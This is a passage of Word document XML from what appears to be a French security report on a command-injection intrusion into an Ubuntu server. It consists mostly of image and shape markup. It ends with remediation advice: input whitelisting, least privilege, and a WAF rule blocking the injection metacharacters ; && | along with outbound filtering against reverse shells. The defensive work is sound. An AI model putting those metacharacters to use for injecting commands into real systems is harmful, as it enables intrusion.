          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251656192" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="77C64FA7" wp14:editId="3CA6A54E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1632585</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>19049</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="724535" cy="440055"/>
                <wp:effectExtent l="27940" t="10160" r="84455" b="103505"/>
                <wp:wrapNone/>
                <wp:docPr id="841389871" name="Flèche : droite 16"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm rot="5400000">
                          <a:off x="0" y="0"/>
                          <a:ext cx="724535" cy="44005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8369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16" o:spid="_x0000_s1026" type="#_x0000_t13" style="position:absolute;margin-left:128.55pt;margin-top:1.5pt;width:57.05pt;height:34.65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" adj="15040" fillcolor="#4f81bd [3204]" strokecolor="#4579b8 [3044]">
                <v:fill color2="#a7bfde [1620]" rotate="t" angle="180" focus="100%" type="gradient">
                  <o:fill v:ext="view" type="gradientUnscaled"/>
                </v:fill>
                <v:shadow on="t" color="black" opacity="22937f" origin=",.5" offset="0,.63889mm"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3935E1EA" w14:textId="77777777" w:rsidR="00FA67FB" w:rsidRDefault="00FA67FB" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="286E9082" w14:textId="6BE6F760" w:rsidR="00FA67FB" w:rsidRDefault="00FA67FB" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="04328F04" wp14:editId="2F9A5532">
            <wp:extent cx="4542790" cy="2354341"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="46658524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8995" cy="2399018"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E60B352" w14:textId="634CC765" w:rsidR="00FA67FB" w:rsidRDefault="00FA67FB" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="112B3E30" wp14:editId="0852D707">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3081337</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>69533</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="916942" cy="574675"/>
                <wp:effectExtent l="0" t="19368" r="54293" b="92392"/>
                <wp:wrapNone/>
                <wp:docPr id="1032316592" name="Flèche : droite 17"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm rot="5400000">
                          <a:off x="0" y="0"/>
                          <a:ext cx="916942" cy="5746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6D7FD" id="Flèche : droite 17" o:spid="_x0000_s1026" type="#_x0000_t13" style="position:absolute;margin-left:242.6pt;margin-top:5.5pt;width:72.2pt;height:45.2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" adj="14831" fillcolor="#4f81bd [3204]" strokecolor="#4579b8 [3044]">
                <v:fill color2="#a7bfde [1620]" rotate="t" angle="180" focus="100%" type="gradient">
                  <o:fill v:ext="view" type="gradientUnscaled"/>
                </v:fill>
                <v:shadow on="t" color="black" opacity="22937f" origin=",.5" offset="0,.63889mm"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD15E4E" w14:textId="3E94FF10" w:rsidR="00A96198" w:rsidRDefault="00A96198" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EA92C4D" w14:textId="41EAAF1D" w:rsidR="00FA67FB" w:rsidRDefault="00FA67FB" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47AE896F" w14:textId="0604EF65" w:rsidR="00FA67FB" w:rsidRDefault="00FA67FB" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62011CD1" w14:textId="66827382" w:rsidR="00FA67FB" w:rsidRDefault="00FA67FB" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="359630BF" wp14:editId="10E47DB2">
            <wp:extent cx="6654800" cy="2006600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="13859600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7115" cy="2007298"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2947E6" w14:textId="1699C027" w:rsidR="00FA67FB" w:rsidRPr="00DD5771" w:rsidRDefault="00FA67FB" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:spacing w:before="160" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D5163A5" w14:textId="7AAF2103" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="18" w:space="4" w:color="1A365D"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:b/>
          <w:color w:val="1A365D"/>
          <w:sz w:val="36"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>6. RECOMMANDATIONS ET REMÉDIATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3668ADB3" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Pour sécuriser de manière définitive le serveur Ubuntu face à ce type d'intrusion critique, trois actions fondamentales de remédiation doivent être appliquées :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DC7023" w14:textId="1D9769D3" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:pStyle w:val="Listepuces"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Assainissement des entrées (Input </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Sanitization</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>) : Interdire la concaténation brute de saisies utilisateurs au sein de fonctions d'exécution système (</w:t>
      </w:r>
      <w:r w:rsidR="00EA3F4B" w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>ex :</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> éviter '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>shell_exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>' ou 'system' en PHP). Privilégier l'usage d'API spécifiques ou appliquer un filtrage strict par liste blanche (uniquement des caractères numériques et points pour les adresses IP).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC6CCD3" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:pStyle w:val="Listepuces"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>2. Principe du moindre privilège : S'assurer que le service web s'exécute sous un utilisateur dédié à droits restreints (comme www-data) et restreindre l'accès aux binaires système critiques comme '/bin/sh' ou '/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>' pour ces processus.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AC99E3" w14:textId="77777777" w:rsidR="00A96198" w:rsidRPr="00DD5771" w:rsidRDefault="00000000" w:rsidP="00EA3F4B">
      <w:pPr>
        <w:pStyle w:val="Listepuces"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>3. Durcissement Réseau (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Hardening</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DD5771">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>) : Configurer un pare-feu applicatif (WAF) pour inspecter les flux HTTP et bloquer les requêtes comportant des métacaractères d'injection (; &amp;&amp; |), et maintenir un niveau de filtrage réseau strict limitant les connexions sortantes (bloquer les flux sortants imprévus pour neutraliser les Reverse Shells).</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00A96198" w:rsidRPr="00DD577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363B" w14:textId="77777777" w:rsidR="002F2811" w:rsidRDefault="002F2811" w:rsidP="008D1310">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2DE50120" w14:textId="77777777" w:rsidR="002F2811" w:rsidRDefault="002F2811" w:rsidP="008D1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32CE" w14:textId="77777777" w:rsidR="002F2811" w:rsidRDefault="002F2811" w:rsidP="008D1310">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="12627F60" w14:textId="77777777" w:rsidR="002F2811" w:rsidRDefault="002F2811" w:rsidP="008D1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13726807">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1390030124">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="667757235">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="712844994">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1043018802">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="154077299">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1767267251">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="575627225">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="192946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811"/>
    <w:rsid w:val="00326F90"/>
    <w:rsid w:val="00491FD1"/>
    <w:rsid w:val="00844F46"/>
    <w:rsid w:val="008747F5"/>
    <w:rsid w:val="008D1310"/>
    <w:rsid w:val="00A96198"/>
    <w:rsid w:val="00AA1D8D"/>
    <w:rsid w:val="00B47730"/>
    <w:rsid w:val="00B50FCE"/>
    <w:rsid w:val="00CB0664"/>
    <w:rsid w:val="00DD5771"/>
    <w:rsid w:val="00EA3F4B"/>
    <w:rsid w:val="00FA6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11E6A"/>
  <w14:defaultImageDpi w14:val="300"/>
  <w15:docId w15:val="{4A086EE0-2327-400E-A559-AE7DFD81B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FCE"/>
    <w:pPr>
      <w:spacing w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
      <w:color w:val="2D374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D5771"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:color w:val="auto"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="fr-TG" w:eastAsia="fr-T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1237</Words>
  <Characters>7056</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jude AKOLI</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-20T11:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-20T11:54:00Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>